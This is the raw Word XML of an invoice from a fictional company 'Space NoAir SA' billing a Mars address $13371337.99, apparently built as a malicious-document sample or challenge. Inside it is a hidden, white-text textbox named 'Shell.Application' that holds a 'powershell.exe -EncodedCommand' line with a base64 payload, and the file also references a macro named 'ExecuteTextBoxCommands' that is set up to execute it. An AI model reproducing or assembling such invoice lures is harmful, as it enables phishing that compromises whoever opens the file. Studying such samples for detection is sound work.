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C359DC" w14:textId="04FC0DC8" w:rsidR="00C86701" w:rsidRPr="001867B7" w:rsidRDefault="00C86701" w:rsidP="00C86701">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="1119"/>
        <w:tblW w:w="9557" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa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812"/>
        <w:gridCol w:w="140"/>
        <w:gridCol w:w="2380"/>
        <w:gridCol w:w="1249"/>
        <w:gridCol w:w="1332"/>
        <w:gridCol w:w="168"/>
        <w:gridCol w:w="1376"/>
        <w:gridCol w:w="50"/>
        <w:gridCol w:w="50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="30B93436" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="585"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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F5B2C3C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4FB8F9"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t xml:space="preserve">Space </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4FB8F9"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>NoAir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="4FB8F9"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t xml:space="preserve"> SA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7BCAF1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gridSpan w:val="3"/>
            <w:vMerge w:val="restart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C9524FF" w14:textId="77777777" w:rsidR="00C86701" w:rsidRPr="00464AD1" w:rsidRDefault="00C86701" w:rsidP="004F2AC7">
            <w:pPr>
              <w:spacing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46589B81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C14D2E9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Building name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5EBFF9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9B8767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1 564-555-1234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4A527F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gridSpan w:val="3"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EFC0BA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70EABF79" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="233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526B6B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  <w:t>Space Station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4EFD39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F9635E0" w14:textId="3346A2E0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proofErr w:type="spellStart"/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invoice@spaceno</w:t>
            </w:r>
            <w:r w:rsidR="00C95625">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL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37E338A0" wp14:editId="17F807F3">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-28575</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>0</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1270000" cy="1270000"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="6" name="Shell.Application" descr="ShellExecute" hidden="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270000" cy="1270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>
                                <a:outerShdw blurRad="63500" dist="37357" dir="2700000" rotWithShape="0">
                                  <a:srgbClr val="020202"/>
                                </a:outerShdw>
                              </a:effectLst>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="5A33026D" w14:textId="1E31F19C" w:rsidR="00C95625" w:rsidRDefault="00C95625">
                                  <w:r w:rsidRPr="00C95625">
                                    <w:rPr>
                                      <w:color w:val="FFFFFF"/>
                                    </w:rPr>
                                    <w:t>powershell.exe| -EncodedCommand |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</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:t>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oMW45cGgxNWgxbDlg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q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7E338A0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Shell.Application" o:spid="_x0000_s1026" type="#_x0000_t202" alt="ShellExecute" style="position:absolute;margin-left:-2.25pt;margin-top:0;width:100pt;height:100pt;z-index:251660288;visibility:hidden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" filled="f" strokeweight=".5pt">
                      <v:fill o:detectmouseclick="t"/>
                      <v:shadow on="t" color="#020202" origin=",.5" offset=".73375mm,.73375mm"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="5A33026D" w14:textId="1E31F19C" w:rsidR="00C95625" w:rsidRDefault="00C95625">
                            <w:r w:rsidRPr="00C95625">
                              <w:rPr>
                                <w:color w:val="FFFFFF"/>
                              </w:rPr>
                              <w:t>powershell.exe| -EncodedCommand |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</w:t>
                            </w:r>
                            <w:r>
                              <w:t>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uMWg5dmg3NW4xaDl2aDc1bjFoOXZoNzVoMW45cGgxNWgxbDlg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q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aDFuOXBoMTVoMW45cGgxNWgxbjlwaDE1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air.moon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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09DDEA4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gridSpan w:val="3"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0373149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38C6C086" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="8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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78C06922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Mars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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088E380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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53078BE7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8EFB5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gridSpan w:val="3"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4C9A4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05D10C3E" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="289"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2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BD4B9E9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en-US" w:eastAsia="en-NL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  <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>3 37 MARS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6AECE25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Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
                <w:color w:val="000000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CB3A3AF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gridSpan w:val="3"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="329B2B1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27507B75" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="360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FCF55CE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BILLED TO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1B8AEB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BAD0D00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8D87240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2A3AC0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C0BA43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A8C9B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5C6D5126" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="67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59CED87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John Doe</w:t>
            </w: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 xml:space="preserve"> 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0512C76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5236B3B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AD5916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E37CB8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D889D70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D0CBAF7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396EAD54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8CEFA37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FC7E3A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4630 Marigold Lane</w:t>
            </w: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 xml:space="preserve"> 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76200E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5C94721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5BA9316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1A95B27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91ACECB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47C239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61E953C9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5FC35F2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Doral</w:t>
            </w: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Florida</w:t>
            </w:r>
            <w:r w:rsidRPr="00464AD1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 xml:space="preserve">, </w:t>
            </w:r>
            <w:r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USA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AE7B3B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BBA32A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1359DD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0F5EA6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52F017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758BA21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020848C5" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="115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F40310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  <w:t>33178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CA54EF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CD3B59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0E9797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7E63C8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6ADB10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06D740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1F8849CD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2DC7175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FC7E3A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>321-362-9820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DF943D9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AC98B6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E6B5B24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7944E2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F86A1A7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AF4770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3AD28B45" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="210"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart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A83FEA9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5D7079"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>Invoice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4CD744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F2D4A9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6D51D74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8D7BE9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7B84DD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48F5C3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462D8991" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="330"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A359A54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140" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="356E4E3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2380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4FB8F9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3BAD18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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>DESCRIPTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4FB8F9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104B0BD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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>UNIT COST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4FB8F9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BFCF8D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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>QTY/HR RATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4FB8F9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2E2E9BB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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>AMOUNT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="6FDF35F6" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="120"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C03695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vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09EC7357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5964" w:type="dxa"/>
            <w:gridSpan w:val="5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F11907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</w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="2A7A3016" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="480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1260252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INVOICE NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140" w:type="dxa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A33E99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2380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F7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4962679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Ticket REFERENCE: #945239815</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F7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F4E9BCB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$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13371337</w:t>
            </w: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.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99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F7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55BB7830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Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F5F7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3FEA12E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$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13371337</w:t>
            </w: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.</w:t>
            </w:r>
            <w:r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99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="0D7C19B0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9395A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4E21E4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61B19E54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613F05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gridSpan w:val="2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5F8A5D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5EFF917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6C5B37AA" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="294"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr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CF222CB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02DA5E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2418461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680365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2FB14474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SUBTOTAL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E9BED6F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EF08640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$</w:t>
            </w:r>
            <w:r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13371337.99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="327045F2" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="74"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr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2735CB0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TERMS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EB77D0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043DB5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4641B39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6193FA7B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DISCOUNT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4FD1941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CBE7A8C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Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
                <w:color w:val="5D7079"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>-$0.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="17C774C5" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="319"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart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18381CC6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 xml:space="preserve">Please pay invoice by </w:t>
            </w:r>
            <w:r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04</w:t>
            </w:r>
            <w:r w:rsidRPr="00464AD1"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/</w:t>
            </w:r>
            <w:r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11</w:t>
            </w:r>
            <w:r w:rsidRPr="00464AD1"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/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5D7079"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>4096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BB492D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97179A7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154BCB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AD838B5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(TAX RATE)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7404402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621D4406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Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
                <w:color w:val="5D7079"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="10BCED8D" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:trHeight w:val="51"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D7743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399178B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CD089BA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07407379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4E9AA6B3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TAX</w:t>
            </w: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DF9EE48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1836FE0D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Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
                <w:color w:val="5D7079"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>$0.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="6AAB2F98" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:trHeight w:val="455"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr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3AF1EFDF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BANK ACCOUNT DETAILS</w:t>
            </w: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E8C19F2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FCC5440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CC8CE21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gridSpan w:val="3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E988847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b/>
                <w:bCs/>
                <w:color w:val="5D7079"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>INVOICE TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB0DFCA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vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1886139D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</w:tr>
      <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="7F393065" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:trHeight w:val="180"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr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444DD7F3" w14:textId="77777777" w:rsidR="00C8670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val="en"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val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>Account holder:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7962572C" w14:textId="226C50B3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en-NL"/>
              </w:rPr>
              <w:t xml:space="preserve">Space </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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eastAsia="en-NL"/>
              </w:rPr>
              <w:t>NoAir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4CB72147" w14:textId="77777777" w:rsidR="00C8670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val="en"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000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>Account number:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28848905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>
              <w:t>03015868</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8951B0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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520FDB13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55457C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4FB801A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gridSpan w:val="3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61250CE8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jc w:val="right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color w:val="4E535C"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4E535C"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>13371337</w:t>
            </w:r>
            <w:r w:rsidRPr="00464AD1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4E535C"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4E535C"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="en" w:eastAsia="en-NL"/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="656D0FEC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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2408C34D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  <w:tr w:rsidR="00C86701" w:rsidRPr="00464AD1" w14:paraId="20E88BB3" w14:textId="77777777" w:rsidTr="004F2AC7">
        <w:trPr>
          <w:trHeight w:val="156"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3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50028136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0B23CB76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77413559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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA87C1D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tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29AE23DA" w14:textId="77777777" w:rsidR="00C86701" w:rsidRPr="00464AD1" w:rsidRDefault="00C86701" w:rsidP="004F2AC7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en-NL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00464AD1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en" w:eastAsia="en-NL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18A2285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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FF1F8F5" w14:textId="77777777" w:rsidR="00C86701" w:rsidRPr="00464AD1" w:rsidRDefault="00C86701" w:rsidP="004F2AC7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  <w:lang w:eastAsia="en-NL"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="729F3766" w14:textId="482B3A5E" w:rsidR="000A564B" w:rsidRPr="00C86701" w:rsidRDefault="00987583" w:rsidP="00C86701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en-NL"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00C86701" w:rsidRPr="00464AD1">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-NL"/>
          </w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="wps">
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="05B368F2" wp14:editId="4ECDCC80">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>left</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="line">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="7772400" cy="733425"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="17" name="Rectangle 17">
                    <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId5"/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spect="1" noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="7772400" cy="7334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3D2FAE6F" id="Rectangle 17" o:spid="_x0000_s1026" href="https://wise.com/" style="position:absolute;margin-left:0;margin-top:0;width:612pt;height:57.75pt;z-index:251659264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lin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" o:allowoverlap="f" o:button="t" filled="f" stroked="f">
                  <v:fill o:detectmouseclick="t"/>
                  <o:lock v:ext="edit" aspectratio="t"/>
                  <w10:wrap type="square" anchory="line"/>
                </v:rect>
              </w:pict>
            </mc:Fallback>
          </mc:AlternateContent>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="000A564B" w:rsidRPr="00C8670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altName w:val="Roboto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formsDesign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11D68"/>
    <w:rsid w:val="000A564B"/>
    <w:rsid w:val="003E6EA0"/>
    <w:rsid w:val="00457B82"/>
    <w:rsid w:val="004E37F0"/>
    <w:rsid w:val="006A3DEE"/>
    <w:rsid w:val="00987583"/>
    <w:rsid w:val="009F4C82"/>
    <w:rsid w:val="00B8327C"/>
    <w:rsid w:val="00BA4424"/>
    <w:rsid w:val="00BC2EEE"/>
    <w:rsid w:val="00C11D68"/>
    <w:rsid w:val="00C16242"/>
    <w:rsid w:val="00C86701"/>
    <w:rsid w:val="00C95625"/>
    <w:rsid w:val="00D0419E"/>
    <w:rsid w:val="00DC6944"/>
    <w:rsid w:val="00E33A39"/>
    <w:rsid w:val="00F202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BC79E9A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8943A7E7-1BC7-4A88-A504-B3814967D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8670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  <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.EXECUTETEXTBOXCOMMANDS" wne:name="Project.ThisDocument.ExecuteTextBoxComman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hyperlink" Target="https://wise.com/" TargetMode="Externa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0xp374\Documents\Custom%20Office%20Templates\simple_doc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simple_doc</Template>
  <TotalTime>48</TotalTime>
  <Pages>1</Pages>
  <Words>100</Words>
  <Characters>575</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>674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0xp374</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>0xp374</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-17T09:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-17T10:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>